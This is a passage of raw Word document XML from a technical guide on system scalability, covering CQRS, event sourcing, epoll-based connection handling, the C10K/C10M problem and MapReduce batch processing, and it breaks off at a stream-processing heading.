          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Need speed, can tolerate eventual consistency, benefit from denormalized/pre-computed views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA5B4C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CQRS works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D49AC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command side (writes):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Receives write requests. Validates, processes, writes to the authoritative write store (normalized relational DB). Emits events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25504E3C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event stream:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Write events are published (e.g., "OrderPlaced", "ItemShipped").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D62C4A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query side (reads):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Consumes events. Maintains one or more read-optimized projections (denormalized, materialized views in different stores):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776DDA36" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A view optimized for "user's order history" (in document DB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5946D2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A view optimized for "search by product" (in Elasticsearch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FED436" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A view optimized for "dashboard analytics" (in columnar DB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261FE101" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079E7C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Write store scales for writes only (no read load).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F57BA96" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Read stores scale independently with replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DE787" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each read store is optimized for its specific access pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC81A7B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>You can add new read projections without touching the write path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ACC4DC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Eventual consistency between write and read sides. Complexity of maintaining projections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D092694" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Event Sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319E2F1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532415F6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Instead of storing current state, store the sequence of events that produced the state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B531D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Traditional: account.balance = 500 (overwrite).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726043B8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Event sourced: [Deposited(1000), Withdrew(300), Withdrew(200)] → derive balance = 500.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212CEEB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56990EEC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Append-only writes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Extremely fast (no read-modify-write cycles, no lock contention on existing records).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE4FD2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unlimited read model scaling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Replay events to build any read projection you need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A90E33" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time travel:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Query the state at any point in history (replay events up to that point).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57926503" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Natural audit trail:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Complete history of every change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639FD8E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The compaction problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C105C8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>An entity with millions of events takes too long to reconstruct. Solution: </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — periodically save the current derived state. To reconstruct: load latest snapshot + replay events after the snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07914A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="56FEB0DA">
          <v:rect id="_x0000_i2298" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D903C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Network-Level Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E732B29" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Connection Handling Models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B83CE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread-per-connection (traditional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C73B7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each incoming connection gets a dedicated OS thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0134F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Thread blocks on I/O (waiting for database response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1CA1E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scalability limit: OS threads are expensive (~1MB stack each). 10,000 connections = 10,000 threads = ~10GB RAM just for stacks + massive context-switching overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA3A3A8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event-driven / non-blocking I/O (modern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA5E2A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A single thread manages thousands of connections using an event loop (epoll on Linux, kqueue on BSD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B4E19" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>When a connection has data to read, the OS notifies the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FCA95" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The thread processes the data and moves on. Never blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B8421" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Scalability: A single thread can handle 100,000+ concurrent connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018C332" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How epoll works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010553DF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Create an epoll instance (a kernel data structure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F4B7B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Register file descriptors (sockets) with events of interest (readable, writable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF93BC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Call epoll_wait() — blocks until one or more FDs are ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C387BC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Kernel returns a list of ready FDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B1BA0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application processes each ready FD without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649FAB5B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why Nginx serves 10,000+ concurrent connections on a single machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> while Apache (thread-per-connection) struggled beyond 1,000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DA0EB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 The C10K / C10M Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A932F8F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C10K (10,000 concurrent connections):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Solved by event-driven architectures (Nginx, Node.js, Netty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B947922" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C10M (10 million concurrent connections):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7F4AD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Kernel bypass (DPDK, io_uring) — avoid kernel overhead on every packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68727D31" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Zero-copy networking — avoid copying data between kernel and user space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39B3AB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Lock-free data structures — avoid contention between cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE6C0E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Memory-mapped I/O — reduce system call overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21743320" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="03D387B2">
          <v:rect id="_x0000_i2299" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DA0488" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Batch Processing vs. Stream Processing for Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC87D6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Batch Processing (MapReduce / Spark)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423D996" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The scalability model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F2CDB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Input: A huge dataset (terabytes, petabytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14488D7A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Processing: Divide the data into chunks, distribute to hundreds/thousands of machines, process in parallel, combine results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E683279" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scaling: Add more machines = process faster (near-linear for parallelizable workloads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E652BCA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How MapReduce scales internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4DCA6F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Split:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Input is divided into 64MB–128MB chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255BED4D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Map:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each chunk is processed by a mapper independently (embarrassingly parallel). N mappers = N times the throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB68CE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shuffle:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Map outputs are sorted and grouped by key, transferred across the network to reducers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E08BC4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reduce:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each reducer handles one key range, produces final output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EAB62" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The scalability bottleneck:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The shuffle phase. All-to-all network communication between mappers and reducers. This is where network bandwidth becomes the limiting factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE18587" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Stream Processing (Kafka Streams, Flink, Spark Streaming)</w:t>
      </w:r>
    </w:p>
